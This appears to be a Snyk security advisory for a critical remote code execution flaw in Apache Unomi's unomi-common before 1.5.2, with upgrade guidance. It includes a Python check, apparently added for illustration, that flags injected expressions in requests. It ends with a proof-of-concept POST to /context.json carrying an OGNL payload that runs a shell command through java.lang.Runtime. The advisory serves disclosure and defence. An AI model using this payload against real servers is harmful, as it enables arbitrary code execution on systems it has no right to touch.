Remote Code Execution (RCE) Affecting org.apache.unomi:unomi-common package, versions [,1.5.2)

  • Severity

    Critical
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    Low

  • Confidentiality

    High

  • Integrity

    High

  • Availability

    High

  • snyk-id

    SNYK-JAVA-ORGAPACHEUNOMI-1045349

  • published

    25 Nov 2020

  • disclosed

    25 Nov 2020

  • credit

    Eugene Rojavski

How to fix?

Upgrade org.apache.unomi:unomi-common to version 1.5.2 or higher.

Overview

org.apache.unomi:unomi-common is a package that stores user profile information and is mostly used to provide a backend server for A/B testing and personalization.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). It is possible to inject malicious OGNL or MVEL scripts into the /context.json public endpoint.
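A defender-side check for the request shape described above, added here as an example and not taken from the Unomi project: it walks a /context.json body, finds every profilePropertyCondition and flags any propertyName that is not a plain dotted identifier (the allow-list pattern and the sample requests are assumptions constructed for this example).

```python
import json
import re

# Assumed allow-list for Unomi profile property names (e.g. "properties.gender"):
# dotted identifiers only, so OGNL/MVEL syntax such as '#', '(' or '@' is rejected.
PROPERTY_NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)*$")


def find_conditions(node):
    """Yield every profilePropertyCondition object in a body, however deeply nested."""
    if isinstance(node, dict):
        if node.get("type") == "profilePropertyCondition":
            yield node
        for value in node.values():
            yield from find_conditions(value)
    elif isinstance(node, list):
        for item in node:
            yield from find_conditions(item)


def suspicious_property_names(body):
    """Return the propertyName values that do not look like a property name.

    Use the result to reject the request at a gateway/WAF or to raise an alert;
    an empty list means every condition carried a plain dotted identifier.
    """
    flagged = []
    for cond in find_conditions(json.loads(body)):
        name = cond.get("parameterValues", {}).get("propertyName", "")
        if not PROPERTY_NAME_RE.match(name):
            flagged.append(name)
    return flagged


# Constructed sample requests (not the page's PoC): a benign personalization
# and the same request with an expression placed in the propertyName slot.
BENIGN = json.dumps({"personalizations": [{"id": "test", "strategy": "matching-first",
    "contents": [{"filters": [{"condition": {"type": "profilePropertyCondition",
    "parameterValues": {"propertyName": "properties.gender",
    "comparisonOperator": "equals", "propertyValue": "male"}}}]}]}],
    "sessionId": "demo-session-id"})
MALICIOUS = BENIGN.replace("properties.gender", "(#c=#this.getClass()).(#c.getName())")

if __name__ == "__main__":
    print("benign:", suspicious_property_names(BENIGN))        # []
    print("malicious:", suspicious_property_names(MALICIOUS))  # one flagged value
```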

PoC

POST /context.json HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json
Content-Length: 200

{"personalizations":[{"id" : "test","strategy":"matching-first",strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{propertyName":"(#runtimeclass=#this.getClass().forName(\"java.lang.Runtime\")).(#getruntimemethod=#runtimeclass.getDeclaredMethods().{^#this.name.equals(\"getRuntime\")}[0]).(rtobj=#getruntimemethod.invoke(null,null)).(#execmethod=#runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{? #this.getParameters()[0].getType().getName().equals(\"java.lang/String\")}.{? #this.getParameters().length<2[0]).(#execmethod.invoke(#rtobj,\" touch /tmp/POC\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"demo-session-id"}